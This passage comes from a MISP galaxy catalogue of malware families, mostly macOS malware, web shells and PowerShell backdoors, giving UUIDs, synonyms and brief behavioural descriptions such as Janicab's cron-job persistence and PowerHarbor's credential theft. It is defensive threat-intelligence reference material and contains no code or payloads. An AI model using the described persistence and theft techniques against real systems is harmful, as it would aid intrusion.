According to Patrick Wardle, this malware persists a python script as a cron job. Steps: 1. Python installer first saves any existing cron jobs into a temporary file named '/tmp/dump'. 2. Appends its new job to this file. 3. Once the new cron job has been added 'python (~/.t/runner.pyc)' runs every minute.

Internal MISP references

UUID 01325d85-297f-40d5-b829-df9bd996af5a which can be used as unique global reference for Janicab (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

JokerSpy

Internal MISP references

UUID 171b0695-8cea-4ca6-a3f0-c9a8455ef9de which can be used as unique global reference for JokerSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KANDYKORN

Internal MISP references

UUID d314856b-1c07-4f4a-ab3e-eeae38536857 which can be used as unique global reference for KANDYKORN in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KeRanger

Internal MISP references

UUID 01643bc9-bd61-42e8-b9f1-5fbf83dcd786 which can be used as unique global reference for KeRanger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Keydnap

Internal MISP references

UUID 2173605b-bf44-4c76-b75a-09c53bb322d6 which can be used as unique global reference for Keydnap in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kitmos

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kitmos.

Known Synonyms
`KitM`

Internal MISP references

UUID 8a1b1c99-c149-4339-9058-db3b4084cdcd which can be used as unique global reference for Kitmos in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Komplex

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Komplex.

Known Synonyms
`JHUHUGIT`
`JKEYSKW`
`SedUploader`

Internal MISP references

UUID d26b5518-8d7f-41a6-b539-231e4962853e which can be used as unique global reference for Komplex in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Kuiper (OS X)

Internal MISP references

UUID c39087ca-05b7-4374-aff1-116a73f2ba74 which can be used as unique global reference for Kuiper (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lador

Internal MISP references

UUID 9c6b54ce-44a0-4d0c-89cb-6532c8f89d8d which can be used as unique global reference for Lador in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lambert (OS X)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lambert (OS X).

Known Synonyms
`GreenLambert`

Internal MISP references

UUID 7433f3a8-f53c-4ba0-beff-e312fae9ad39 which can be used as unique global reference for Lambert (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Laoshu

Internal MISP references

UUID a13a2cb8-b0e6-483a-9916-f44969a2c42b which can be used as unique global reference for Laoshu in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Leverage

Internal MISP references

UUID 15daa766-f721-4fd5-95fb-153f5361fb87 which can be used as unique global reference for Leverage in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LockBit (OS X)

Internal MISP references

UUID 0821b5c8-db48-4d0e-a969-384dbd74a6c9 which can be used as unique global reference for LockBit (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MacDownloader

Internal MISP references

UUID 910d3c78-1a9e-4600-a3ea-4aa5563f0f13 which can be used as unique global reference for MacDownloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MacInstaller

Internal MISP references

UUID d1f8af3c-719b-4f64-961b-8d89a2defa02 which can be used as unique global reference for MacInstaller in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MacRansom

Internal MISP references

UUID 66862f1a-5823-4a9a-bd80-439aaafc1d8b which can be used as unique global reference for MacRansom in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MacSpy

Internal MISP references

UUID c9915d41-d1fb-45bc-997e-5cd9c573d8e7 which can be used as unique global reference for MacSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MacVX

Internal MISP references

UUID 4db9012b-d3a1-4f19-935c-4dbc7fdd93fe which can be used as unique global reference for MacVX in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MaMi

Internal MISP references

UUID 7759534c-3298-42e9-adab-896d7e507f4f which can be used as unique global reference for MaMi in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Manuscrypt

Internal MISP references

UUID f85c3ec9-81f0-4dee-87e6-b3f6b235bfe7 which can be used as unique global reference for Manuscrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mokes (OS X)

Internal MISP references

UUID bfbb6e5a-32dc-4842-936c-5d8497570c74 which can be used as unique global reference for Mokes (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mughthesec

Internal MISP references

UUID aa1bf4e5-9c44-42a2-84e5-7526e4349405 which can be used as unique global reference for Mughthesec in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NetWire

Internal MISP references

UUID f0d52afd-e7c9-4bd1-be8a-9ab09b14ea24 which can be used as unique global reference for NetWire in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OceanLotus

According to PcRisk, Research shows that the OceanLotus 'backdoor' targets MacOS computers. Cyber criminals behind this backdoor have already used this malware to attack human rights and media organizations, some research institutes, and maritime construction companies.

The OceanLotus backdoor is distributed via a fake Adobe Flash Player installer and a malicious Word document (it is likely that threat authors distribute the document via malspam emails).

Internal MISP references

UUID 65b7eff4-741c-445e-b4e0-8a4e4f673a65 which can be used as unique global reference for OceanLotus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Olyx

Internal MISP references

UUID cd397973-8f42-4c49-8322-414ea77ec773 which can be used as unique global reference for Olyx in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

oRAT

SentinelOne describes this as a malware written in Go, mixing own custom code with code from public repositories.

Internal MISP references

UUID 699dac0f-092c-4c8e-85e9-6e3c86129190 which can be used as unique global reference for oRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OSAMiner

Internal MISP references

UUID 89d0c423-c4ff-46e8-8c79-ea5e974e53e7 which can be used as unique global reference for OSAMiner in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Patcher

This crypto-ransomware for macOS was caught spreading via BitTorrent distribution sites in February 2017, masquerading as 'Patcher', an application used for pirating popular software like Adobe Premiere Pro or Microsoft Office for Mac.

The downloaded torrent contained an application bundle in the form of a single zip file. After launching the fake application, the main window of the fake cracking tool was displayed.

The file encryption process was launched after the misguided victim clicked 'Start'. Once executed, the ransomware generated a random 25-character string and set it as the key for RC4 encryption of all of the user's files. It then demanded ransom in Bitcoin, as instructed in the 'README!' .txt file copied all over the user's directories.

Despite the instructions being quite thorough, Patcher lacked the functionality to communicate with any C&C server, and therefore made it impossible for its operators to decrypt affected files. The randomly generated encryption key was also too long to be guessed via a brute-force attack, leaving the encrypted data unrecoverable in a reasonable amount of time.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Patcher.

Known Synonyms
`FileCoder`
`Findzip`

Internal MISP references

UUID bad1057c-4f92-4747-a0ec-31bcc062dab8 which can be used as unique global reference for Patcher in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PintSized

Backdoor as a fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string.

Internal MISP references

UUID de13bec0-f443-4c5a-91fe-2223dad43be5 which can be used as unique global reference for PintSized in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Pirrit

Internal MISP references

UUID b749ff3a-df68-4b38-91f1-649864eae52c which can be used as unique global reference for Pirrit in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

POOLRAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular POOLRAT.

Known Synonyms
`SIMPLESEA`
`SIMPLETEA`

Internal MISP references

UUID bfd9e30e-ddc7-426f-8f77-4d2e1a846541 which can be used as unique global reference for POOLRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Poseidon (OS X)

Part of Mythic C2, written in Golang.

Internal MISP references

UUID e4ac9105-c3ad-41e2-846b-048e2bbedc6a which can be used as unique global reference for Poseidon (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Poseidon Stealer

macOS infostealer sold by an individual named Rodrigo4, currently consisting of a disk image containing a Mach-O without app bundle, which when executed spawns osascript executing an AppleScript with the actual infostealer payload. The AppleScript payload will steal files by packing them in a ZIP archive and uploading them to a hardcoded C2 via HTTP.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Poseidon Stealer.

Known Synonyms
`Rodrigo Stealer`

Internal MISP references

UUID 9eb9f899-acfb-4452-981f-5937aa1f47cc which can be used as unique global reference for Poseidon Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Proton RAT

Proton RAT is a Remote Access Trojan (RAT) specifically designed for macOS systems. It is known for providing attackers with complete remote control over the infected system, allowing the execution of commands, keystroke capturing, access to the camera and microphone, and the ability to steal credentials stored in browsers and other password managers. This malware typically spreads through malicious or modified applications, which, when downloaded and installed by unsuspecting users, trigger its payload. Proton RAT is notorious for its sophistication and evasion capabilities, including techniques to bypass detection by installed security solutions.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Proton RAT.

Known Synonyms
`Calisto`

Internal MISP references

UUID d7e31f19-8bf2-4def-8761-6c5bf7feaa44 which can be used as unique global reference for Proton RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Pwnet

Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack.

Internal MISP references

UUID 70059ec2-9315-4af7-b65b-2ec35676a7bb which can be used as unique global reference for Pwnet in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dok

Dok a.k.a. Retefe is the macOS version of the banking trojan Retefe. It consists of a codesigned Mach-O dropper usually malspammed in an app bundle within a DMG disk image, posing as a document. The primary purpose of the dropper is to install a Tor client as well as a malicious CA certificate and proxy pac URL, in order to redirect traffic to targeted sites through their Tor node, effectively carrying out a MITM attack against selected web traffic. It also installs a custom hosts file to prevent access to Apple and VirusTotal. The macOS version shares its MO, many TTPs and infrastructure with the Windows counterpart.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dok.

Known Synonyms
`Retefe`

Internal MISP references

UUID 80acc956-d418-42e3-bddf-078695a01289 which can be used as unique global reference for Dok in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RustBucket (OS X)

Internal MISP references

UUID 03f356e6-296f-4195-bed0-9719a84887db which can be used as unique global reference for RustBucket (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Shlayer

According to PCrisk, Shlayer is a trojan-type virus designed to proliferate various adware and other unwanted applications, and promote fake search engines. It is typically disguised as a Adobe Flash Player installer and various software cracking tools.

In most cases, users encounter this virus when visiting dubious Torrent websites that are full of intrusive advertisements and deceptive downloads.

Internal MISP references

UUID c3ee82df-a004-4c68-89bd-eb4bb2dfc803 which can be used as unique global reference for Shlayer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Silver Sparrow

According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple’s new M1 chips but has been distributed without payload so far.

Internal MISP references

UUID f6a7aeeb-fcc5-4d26-9eab-c0b6e2819a6c which can be used as unique global reference for Silver Sparrow in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SimpleTea (OS X)

SimpleTea is a RAT for macOS that is based on the same object-oriented project as SimpleTea for Linux (SimplexTea).

It also shares similarities with POOLRAT (also known as SIMPLESEA), like the supported commands or a single-byte XOR encryption of its configuration. However, the indices of commands are different.

SimpleTea for macOS was uploaded to VirusTotal from Hong Kong and China in September 2023.

Internal MISP references

UUID ce384804-8580-4d57-97b3-bde0d903f703 which can be used as unique global reference for SimpleTea (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SpectralBlur (OS X)

Internal MISP references

UUID c7c32006-a2d1-4bc2-8a25-84c07286464a which can be used as unique global reference for SpectralBlur (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SUGARLOADER

Internal MISP references

UUID 171501fd-d504-4257-9c3d-fbc066d6eeba which can be used as unique global reference for SUGARLOADER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SysJoker (OS X)

Internal MISP references

UUID 5bffe0fe-22f6-4d18-9372-f8c5d262d852 which can be used as unique global reference for SysJoker (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

systemd

General purpose backdoor

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular systemd.

Known Synonyms
`Demsty`
`ReverseWindow`

Internal MISP references

UUID a8e7687b-9db7-4606-ba81-320d36099e3a which can be used as unique global reference for systemd in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Tsunami (OS X)

Internal MISP references

UUID 59d4a2f3-c66e-4576-80ab-e04a4b0a4317 which can be used as unique global reference for Tsunami (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified macOS 001 (UnionCryptoTrader)

Internal MISP references

UUID 1c96f6b9-6b78-4137-9d5f-aa5575f80daa which can be used as unique global reference for Unidentified macOS 001 (UnionCryptoTrader) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

UpdateAgent

Internal MISP references

UUID 1f1bc885-5987-41fa-bb04-8775eeb45d88 which can be used as unique global reference for UpdateAgent in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Uroburos (OS X)

Internal MISP references

UUID 13173d75-45f0-4183-8e18-554a5781405c which can be used as unique global reference for Uroburos (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vigram

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Vigram.

Known Synonyms
`WizardUpdate`

Internal MISP references

UUID 021e2fb4-1744-4fde-8d59-b247f1b34062 which can be used as unique global reference for Vigram in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WatchCat

Internal MISP references

UUID a73468d5-2dee-4828-8bbb-c37ea9295584 which can be used as unique global reference for WatchCat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WindTail

Internal MISP references

UUID 48751182-0b17-4326-8a72-41e4c4be35e7 which can be used as unique global reference for WindTail in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Winnti (OS X)

Internal MISP references

UUID 5aede44b-1a30-4062-bb97-ac9f4985ddb6 which can be used as unique global reference for Winnti (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WireLurker (OS X)

Internal MISP references

UUID bc32df24-8e80-44bc-80b0-6a4d55661aa5 which can be used as unique global reference for WireLurker (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Wirenet (OS X)

Internal MISP references

UUID f99ef0dc-9e96-42e0-bbfe-3616b3786629 which can be used as unique global reference for Wirenet (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

X-Agent (OS X)

Internal MISP references

UUID 858f4396-8bc9-4df8-9370-490bbb3b4535 which can be used as unique global reference for X-Agent (OS X) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XCSSET

Internal MISP references

UUID 041aee7f-cb7a-4199-9fe5-494801a18273 which can be used as unique global reference for XCSSET in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Xloader

Xloader is a Rebranding of Formbook malware (mainly a stealer), available for macOS as well.

Formbook has a "magic"-value FBNG (FormBook-NG), while Xloader has a "magic"-value XLNG (XLoader-NG). This "magic"-value XLNG is platform-independent.

Not to be confused with apk.xloader or ios.xloader.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Xloader.

Known Synonyms
`Formbook`

Internal MISP references

UUID d5f2f6ad-2ed0-42d4-9116-f95eea2ab543 which can be used as unique global reference for Xloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XSLCmd

Internal MISP references

UUID 120a5890-dc3e-42e8-950e-b5ff9a849d2a which can be used as unique global reference for XSLCmd in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Yort

Internal MISP references

UUID 725cd3eb-1025-4da3-bcb1-a7b6591c632b which can be used as unique global reference for Yort in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZuRu

A malware that was observed being embedded alongside legitimate applications (such as iTerm2) offered for download on suspicious websites pushed in search engines. It uses a Python script to perform reconnaissance on the compromised system an pulls additional payload(s).

Internal MISP references

UUID bd293592-d2dd-4fdd-88e7-6098e0bbb043 which can be used as unique global reference for ZuRu in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ani-Shell

Ani-Shell is a simple PHP shell with some unique features like Mass Mailer, a simple Web-Server Fuzzer, Dosser, Back Connect, Bind Shell, Back Connect, Auto Rooter etc.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ani-Shell.

Known Synonyms
`anishell`

Internal MISP references

UUID 7ef3c0fd-8736-47b1-8ced-ca7bf6d27471 which can be used as unique global reference for Ani-Shell in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ANTAK

Antak is a webshell written in ASP.Net which utilizes PowerShell.

Internal MISP references

UUID 88a71ca8-d99f-416a-ad29-5af12212008c which can be used as unique global reference for ANTAK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ASPXSpy

Internal MISP references

UUID 4d1c01be-76ad-42dd-b094-7a8dbaf02159 which can be used as unique global reference for ASPXSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Behinder

A webshell for multiple web languages (asp/aspx, jsp/jspx, php), openly distributed through Github.

Internal MISP references

UUID 5e5cd3a6-0348-4c6b-94b1-13ca0d845547 which can be used as unique global reference for Behinder in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

c99shell

C99shell is a PHP backdoor that provides a lot of functionality, for example:

run shell commands;
download/upload files from and to the server (FTP functionality);
full access to all files on the hard disk;
self-delete functionality.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular c99shell.

Known Synonyms
`c99`

Internal MISP references

UUID cd1b8ec2-dbbd-4e73-b9a7-1bd1287a68f2 which can be used as unique global reference for c99shell in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DEWMODE

FireEye discovered the DEWMODE webshell starting mid-December 2020 after exploitation of zero-day vulnerabilities in Accellion's File Transfer Appliance. It is a PHP webshell that allows threat actors to view and download files in the victim machine. It also contains cleanup function to remove itself and clean the Apache log.

Internal MISP references

UUID a782aac8-168d-4691-a182-237d7d473e21 which can be used as unique global reference for DEWMODE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ensikology

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ensikology.

Known Synonyms
`Ensiko`

Internal MISP references

UUID dfd8deac-ce86-4a22-b462-041c19d62506 which can be used as unique global reference for Ensikology in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

p0wnyshell

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular p0wnyshell.

Known Synonyms
`Ponyshell`
`Pownyshell`

Internal MISP references

UUID a6d13ffe-1b1a-46fe-afd9-989e8dec3773 which can be used as unique global reference for p0wnyshell in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Parrot TDS WebShell

In combination with Parrot TDS the usage of a classical web shell was observed by DECODED Avast.io.

Internal MISP references

UUID c9e7c5a6-9082-47ec-89eb-477980e73dcb which can be used as unique global reference for Parrot TDS WebShell in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PAS

Internal MISP references

UUID e6a40fa2-f79f-40e9-89d3-a56984bc51f7 which can be used as unique global reference for PAS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Prometheus Backdoor

Backdoor written in php

Internal MISP references

UUID b4007b02-106d-420f-af1c-76c035843fd2 which can be used as unique global reference for Prometheus Backdoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RedHat Hacker WebShell

Internal MISP references

UUID e94a5b44-f2c2-41dc-8abb-6de69eb38241 which can be used as unique global reference for RedHat Hacker WebShell in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WSO

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WSO.

Known Synonyms
`Webshell by Orb`

Internal MISP references

UUID 7f3794fc-662e-4dde-b793-49bcaccc96f7 which can be used as unique global reference for WSO in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Silence DDoS

Internal MISP references

UUID b5cc7a39-305b-487e-b15a-02dcebefce90 which can be used as unique global reference for Silence DDoS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlackSun

Ransomware.

Internal MISP references

UUID 1fcc4425-6e14-47e6-8434-745cf1bc9982 which can be used as unique global reference for BlackSun in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BONDUPDATER

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BONDUPDATER.

Known Synonyms
`Glimpse`
`Poison Frog`

Internal MISP references

UUID 99600ba5-30a0-4ac8-8583-6288760b77c3 which can be used as unique global reference for BONDUPDATER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CASHY200

Internal MISP references

UUID 7373c789-2dc2-4867-9c60-fa68f8d971a2 which can be used as unique global reference for CASHY200 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EugenLoader

A loader written in Powershell, usually delivered packaged in MSI/MSIX files.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EugenLoader.

Known Synonyms
`FakeBat`
`NUMOZYLOD`
`PaykLoader`

Internal MISP references

UUID cf9c14cf-6246-4858-8bcc-5a943c8df715 which can be used as unique global reference for EugenLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FlowerPower

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FlowerPower.

Known Synonyms
`BoBoStealer`

Internal MISP references

UUID 6f0f034a-13f1-432d-bc70-f78d7f27f46f which can be used as unique global reference for FlowerPower in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FRat Loader

Loader used to deliver FRat (see family windows.frat)

Internal MISP references

UUID 385a3dca-263d-46be-b84d-5dc09ee466d9 which can be used as unique global reference for FRat Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FTCODE

The malware ftcode is a ransomware which encrypts files and changes their extension into .FTCODE. It later asks for a ransom in order to release the decryption key, mandatory to recover your files. It is infamous for attacking Italy pretending to be a notorious telecom provider asking for due payments.

Internal MISP references

UUID f727a05e-c1cd-4e95-b0bf-2a4bb64aa850 which can be used as unique global reference for FTCODE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GhostMiner

Internal MISP references

UUID 0db05333-2214-49c3-b469-927788932aaa which can be used as unique global reference for GhostMiner in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HTTP-Shell

The author describes this open source shell as follows. HTTP-Shell is Multiplatform Reverse Shell. This tool helps you to obtain a shell-like interface on a reverse connection over HTTP. Unlike other reverse shells, the main goal of the tool is to use it in conjunction with Microsoft Dev Tunnels, in order to get a connection as close as possible to a legitimate one.

This shell is not fully interactive, but displays any errors on screen (both Windows and Linux), is capable of uploading and downloading files, has command history, terminal cleanup (even with CTRL+L), automatic reconnection, movement between directories and supports sudo (or sudo su) on Linux-based OS.

Internal MISP references

UUID 50b94b67-dc2a-4953-a354-edf2cc4e17d3 which can be used as unique global reference for HTTP-Shell in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

JasperLoader

Internal MISP references

UUID 286a14a1-7113-4bed-97ce-8db41b312a51 which can be used as unique global reference for JasperLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lazyscripter

Internal MISP references

UUID 74e5711e-b777-4f09-a4bc-db58d5e23e29 which can be used as unique global reference for Lazyscripter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LightBot

According to Bleeping Computer and Vitali Kremez, LightBot is a compact reconnaissance tool suspected to be used to identify high-value targets for potential follow-up ransomware attacks.

Internal MISP references

UUID 319c4b4f-2901-412c-8fa5-70be75ba51cb which can be used as unique global reference for LightBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Octopus (Powershell)

The author describes Octopus as an "open source, pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S."

It is different from the malware win.octopus written in Delphi and attributed to DustSquad by Kaspersky Labs.

Internal MISP references

UUID c3ca7a89-a885-444a-8642-31019b34b027 which can be used as unique global reference for Octopus (Powershell) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OilRig

Internal MISP references

UUID 4a3b9669-8f91-47df-a8bf-a9876ab8edf3 which can be used as unique global reference for OilRig in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PhonyC2

Internal MISP references

UUID c630e510-a0ad-405a-9aeb-9d8057b6a868 which can be used as unique global reference for PhonyC2 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

POSHSPY

Internal MISP references

UUID 4df1b257-c242-46b0-b120-591430066b6f which can be used as unique global reference for POSHSPY in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PowerBrace

Internal MISP references

UUID 7b334343-0045-4d65-b28a-ebf912c7aafc which can be used as unique global reference for PowerBrace in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PowerHarbor

PowerHarbor is a modular PowerShell-based malware that consists of various modules. The primary module maintains constant communication with the C2 server, executing and deleting additional modules received from it. Currently, the communication with the C2 server is encrypted using RSA encryption and hardcoded key data. Moreover, the main module incorporates virtual machine (VM) detection capabilities. The StealData module employs the Invoke-Stealer function as its core, enabling the theft of system information, browser-stored credentials, cryptocurrency wallet details, and credentials for various applications like Telegram, FileZilla, and WinSCP.

Internal MISP references

UUID 73b40a4c-9163-4a07-bf1b-e4a4344ac63a which can be used as unique global reference for PowerHarbor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PowerPepper

Internal MISP references

UUID 6544c75b-809f-4d31-a235-8906d4004828 which can be used as unique global reference for PowerPepper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

POWERPIPE

Internal MISP references

UUID 60d7f668-66b6-401b-976f-918470a23c3d which can be used as unique global reference for POWERPIPE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

POWERPLANT

This powershell code is a PowerShell written backdoor used by FIN7. Regarding to Mandiant that is was revealed to be a "vast backdoor framework with a breadth of capabilities, depending on which modules are delivered from the C2 server."

Internal MISP references

UUID 697626d3-04a1-4426-aeae-d7054c6e78fb which can be used as unique global reference for POWERPLANT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

powershell_web_backdoor

Internal MISP references

UUID 4310dcab-0820-4bc1-8a0b-9691c20f5b49 which can be used as unique global reference for powershell_web_backdoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PowerShortShell

Internal MISP references

UUID f2198153-2d8b-49ed-b8a8-0952c289b8c0 which can be used as unique global reference for PowerShortShell in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PowerShower

Internal MISP references

UUID 0959a02e-6eba-43dc-bbbf-b2c7488e9371 which can be used as unique global reference for PowerShower in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

POWERSOURCE

POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams.

Internal MISP references

UUID a4584181-f739-43d1-ade9-8a7aa21278a0 which can be used as unique global reference for POWERSOURCE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PowerSpritz

Internal MISP references

UUID c07f6484-0669-44b7-90e6-f642e316d277 which can be used as unique global reference for PowerSpritz in MISP communities and other software using the MISP galaxy

External references

